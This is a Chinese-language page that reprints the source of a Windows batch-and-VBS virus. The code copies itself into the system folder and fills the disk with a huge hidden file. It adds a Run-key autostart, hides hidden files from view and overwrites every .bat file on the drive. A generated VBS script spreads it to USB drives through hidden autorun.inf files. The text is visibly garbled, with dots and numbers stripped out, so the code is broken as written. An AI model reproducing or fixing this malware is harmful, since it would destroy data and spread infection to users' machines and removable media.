復制代碼 代碼如下:
@echo off
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone% %Name :REON% %ozone%
%ozone% %Author:Ozone []% %ozone%
%ozone% %Data ://% %ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
if exsit %SystemDrive%\PAGEFILESSYS goto end
copy % %windir%\system\logonbat ::復制自身
FOR /F tokens=* %%i in (dir /c %SystemDrive%^|find 可用字節) do fsutil file createnew %SystemDrive%\PAGEFILESSYS %%i ::制造超大文件轟炸硬盤
attrib +r +s +h %SystemDrive%\PAGEFILESSYS ::隱藏文件
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV /t REG_SZ /d %windir%\system\logonvbs ::自動啟動
reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f ::不顯示隱藏文件
for /r %SystemDrive% %%i in (*bat) do type %>%%i ::感染
if exist %windir%\system\logonvbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++
echo set fs =createobject(scriptingfilesystemobject)>>%windir%\system\logonvbs
echo set WshShell = WScriptCreateObject(WScriptShell)>>%windir%\system\logonvbs
echo Set objWMIService = GetObject(winmgmts: _>>%windir%\system\logonvbs
echo ^& {impersonationLevel=impersonate}!\\ ^& strComputer ^& \root\cimv)>>%windir%\system\logonvbs
echo Set colDisks = objWMIServiceExecQuery _>>%windir%\system\logonvbs
echo (Select * from Win_LogicalDisk)>>%windir%\system\logonvbs
::監視u盤
echo For i = to >>%windir%\system\logonvbs
echo For Each objDisk in colDisks>>%windir%\system\logonvbs
echo Select Case objDiskDriveType>>%windir%\system\logonvbs
echo :Case :>>%windir%\system\logonvbs
::判斷u盤中是否存在autoruninf不存在則寫入autoruninf並且隱藏
echo y=fsFileExists(objDiskDeviceID ^& \AUTORUNINF)>>%windir%\system\logonvbs
echo if not y then>>%windir%\system\logonvbs
echo set f=fsopentextfile(objDiskDeviceID ^& \AUTORUNINF true)>>%windir%\system\logonvbs
echo fwrite [AutoRun] ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite open=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite shellexecute=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite shell\Auto\command=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fClose>>%windir%\system\logonvbs
echo Set f = fsGetFile(objDiskDeviceID ^& \AUTORUNINF)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
::判斷u盤中是否存在logonbat如果不存在則寫入logonbat並隱藏
echo y=fsFileExists(objDiskDeviceID ^& \logonbat)>>%windir%\system\logonvbs
echo if not y then >>%windir%\system\logonvbs
echo fsCopyFile c:\windows\system\logonbatobjDiskDeviceID ^& \>>%windir%\system\logonvbs
echo Set f = fsGetFile(objDiskDeviceID ^& \logonbat)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
echo dirr = WshshellExpandEnvironmentStrings(%systemdrive%)>>%windir%\system\logonvbs
::判斷u盤中是否存在PAGEFILESSYS如果不存在則寫入PAGEFILESSYS並隱藏
echo y=fsFileExists(dirr & \PAGEFILESSYS)>>%windir%\system\logonvbs
echo if not y then>>%windir%\system\logonvbs
echo WshShellRun logonbat>>%windir%\system\logonvbs
echo WScriptSleep >>%windir%\system\logonvbs
echo Set f = fsGetFile(dirr & \PAGEFILESSYS)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
echo End Select>>%windir%\system\logonvbs
echo Next>>%windir%\system\logonvbs
::每隔秒掃描一次
echo WScriptSleep >>%windir%\system\logonvbs
echo Next>>%windir%\system\logonvbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
:end
From:http://tw.wingwit.com/Article/program/qrs/201404/30411.html
